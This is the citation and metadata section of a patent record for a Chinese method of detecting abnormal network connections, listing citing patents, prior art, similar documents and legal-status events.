Publication number Priority date Publication date Assignee Title
CN113079151B (en) * 2021-03-26 2023-05-16 深信服科技股份有限公司 Abnormality processing method and device, electronic equipment and readable storage medium
CN113254305B (en) * 2021-05-08 2022-08-02 山东英信计算机技术有限公司 Method, system, equipment and storage medium for displaying offline state of testing machine
CN114285619A (en) * 2021-12-20 2022-04-05 北京安天网络安全技术有限公司 Network information display method and device and electronic equipment
CN114285621A (en) * 2021-12-20 2022-04-05 北京安天网络安全技术有限公司 Network threat monitoring method and device and electronic equipment

Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101635658A (en) * 2009-08-26 2010-01-27 中国科学院计算技术研究所 Method and system for detecting abnormality of network secret stealing behavior
CN104836702A (en) * 2015-05-06 2015-08-12 华中科技大学 Host network abnormal behavior detection and classification method under large flow environment
CN106452955A (en) * 2016-09-29 2017-02-22 北京赛博兴安科技有限公司 Abnormal network connection detection method and system
US9774615B1 (en) * 2013-06-27 2017-09-26 Symantec Corporation Techniques for detecting anomalous network traffic
CN108270620A (en) * 2018-01-15 2018-07-10 深圳市联软科技股份有限公司 Network anomaly detection method, device, equipment and medium based on Portrait brand technology
CN109981596A (en) * 2019-03-05 2019-07-05 腾讯科技(深圳)有限公司 A kind of host external connection detection method and device

Patent Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101635658A (en) * 2009-08-26 2010-01-27 中国科学院计算技术研究所 Method and system for detecting abnormality of network secret stealing behavior
US9774615B1 (en) * 2013-06-27 2017-09-26 Symantec Corporation Techniques for detecting anomalous network traffic
CN104836702A (en) * 2015-05-06 2015-08-12 华中科技大学 Host network abnormal behavior detection and classification method under large flow environment
CN106452955A (en) * 2016-09-29 2017-02-22 北京赛博兴安科技有限公司 Abnormal network connection detection method and system
CN108270620A (en) * 2018-01-15 2018-07-10 深圳市联软科技股份有限公司 Network anomaly detection method, device, equipment and medium based on Portrait brand technology
CN109981596A (en) * 2019-03-05 2019-07-05 腾讯科技(深圳)有限公司 A kind of host external connection detection method and device

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
《基于流量信息结构的异常检测》;朱应武;《软件学报》;20101031;第21卷(第10期);2574-2583 *

Also Published As

Publication number Publication date
CN111193633A (en) 2020-05-22

Similar Documents

Publication Publication Date Title
CN111193633B (en) Method and device for detecting abnormal network connection
US11310313B2 (en) Multi-threaded processing of search responses returned by search peers
US11822640B1 (en) User credentials verification for search
US10268755B2 (en) Systems and methods for providing dynamic indexer discovery
US10530790B2 (en) Privileged session analytics
US20180034837A1 (en) Identifying compromised computing devices in a network
JP2019079492A (en) System and method for detection of anomalous events on the basis of popularity of convolutions
WO2021189257A1 (en) Malicious process detection method and apparatus, electronic device, and storage medium
KR102280845B1 (en) Method and apparatus for detecting abnormal behavior in network
CN110737891A (en) host intrusion detection method and device
US10262133B1 (en) System and method for contextually analyzing potential cyber security threats
CN114448830A (en) Equipment detection system and method
CN116545678A (en) Network security protection method, device, computer equipment and storage medium
US9507655B2 (en) Tracking asynchronous entry points for an application
CN108156127B (en) Network attack mode judging device, judging method and computer readable storage medium thereof
CN113688291B (en) Method and device for detecting abnormal behavior of streaming media network data
CN110941823A (en) Threat information acquisition method and device
CN113157480A (en) Error information processing method, device, storage medium and terminal
CN115827379A (en) Abnormal process detection method, device, equipment and medium
US10742667B1 (en) System and method for dynamical modeling multi-dimensional security event data into a graph representation
AU2020221855B2 (en) Activity detection in web applications
US11196766B2 (en) Detecting denial of service attacks in serverless computing
US20210385235A1 (en) Security analysis assistance apparatus, security analysis assistance method, and computer-readable recording medium
CN113810342A (en) Intrusion detection method, device, equipment and medium
CN107066538B (en) Data statistics method and device

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant